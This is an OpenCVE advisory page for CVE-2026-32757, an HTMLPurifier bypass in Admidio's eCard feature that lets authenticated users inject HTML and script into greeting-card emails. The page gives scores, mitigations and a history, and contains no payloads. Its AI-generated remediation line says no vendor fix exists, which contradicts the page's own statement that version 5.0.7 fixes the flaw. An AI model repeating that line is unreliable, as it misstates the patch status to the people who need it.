Description
Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $_POST['ecard_message'] value instead of the HTMLPurifier-sanitized $formValues['ecard_message'] when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent to other members, bypassing the server-side HTMLPurifier sanitization that is properly applied to the ecard_message field during form validation. An attack can result in any member or role receiving phishing content that appears legitimate, crossing from the web application into recipients' email clients. This issue has been fixed in version 5.0.7.
Published: 2026-03-19
Score: 5.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Email Injection / Phishing
Action: Immediate Patch
AI Analysis

Impact

The vulnerability resides in the eCard send handler of Admidio. Instead of using the sanitized value from the form, the code uses the raw $_POST['ecard_message'] when composing the greeting card HTML. Consequently, an authenticated user can inject arbitrary HTML and JavaScript into a greeting card email. This bypasses the server‑side HTMLPurifier sanitization, allowing phishing content that appears legitimate to be sent to other members. The flaw could lead to credential theft or malware installation if victims interact with the injected content.

Affected Systems

Admidio, the open‑source user management solution. All installations of version 5.0.6 and earlier are vulnerable. The issue is resolved in version 5.0.7. The CNA identified the affected vendor/product as Admidio:admidio.

Risk and Exploitability

The CVSS base score of 5.4 indicates moderate severity, and the EPSS score of less than 1% suggests a low probability of exploitation in the wild. The flaw is not present in the KEV list. An attacker must be authenticated and have permission to send eCards. The attack path involves submitting a crafted eCard message that contains malicious HTML or script; the message is then delivered via email to the recipient’s client where the content is rendered. The impact is primarily phishing and potential credential compromise. Given the moderate score and low exploitation likelihood, the risk can be considered moderate but with the possibility of targeted attacks against active Admidio deployments.

Generated by OpenCVE AI on March 23, 2026 at 18:29 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update to Admidio version 5.0.7 or later as recommended by the vendor.
  • If an upgrade cannot be applied immediately, disable or restrict the eCard sending feature to trusted users only and closely monitor eCard activity.
  • Review application logs for suspicious eCard messages and audit user permissions for eCard sending.
  • Apply any custom patches that re‑enforce HTMLPurifier sanitization on the eCard_message field if custom code has been added.

Generated by OpenCVE AI on March 23, 2026 at 18:29 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-4wr4-f2qf-x5wj Admidio has an HTMLPurifier Bypass in eCard Message Allows HTML Email Injection
History

Wed, 25 Mar 2026 15:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 23 Mar 2026 17:00:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*

Fri, 20 Mar 2026 09:00:00 +0000

Type Values Removed Values Added
First Time appeared Admidio
Admidio admidio
Vendors & Products Admidio
Admidio admidio

Thu, 19 Mar 2026 23:30:00 +0000

Type Values Removed Values Added
Description Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $_POST['ecard_message'] value instead of the HTMLPurifier-sanitized $formValues['ecard_message'] when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent to other members, bypassing the server-side HTMLPurifier sanitization that is properly applied to the ecard_message field during form validation. An attack can result in any member or role receiving phishing content that appears legitimate, crossing from the web application into recipients' email clients. This issue has been fixed in version 5.0.7.
Title Admidio: HTMLPurifier Bypass in eCard Message Allows HTML Email Injection
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Subscriptions

Admidio Admidio
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-25T14:48:54.765Z

Reserved: 2026-03-13T18:53:03.532Z

Link: CVE-2026-32757

cve-icon Vulnrichment

Updated: 2026-03-25T14:48:45.363Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-20T00:16:16.930

Modified: 2026-03-23T16:52:29.850

Link: CVE-2026-32757

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-03-25T11:54:00Z

Weaknesses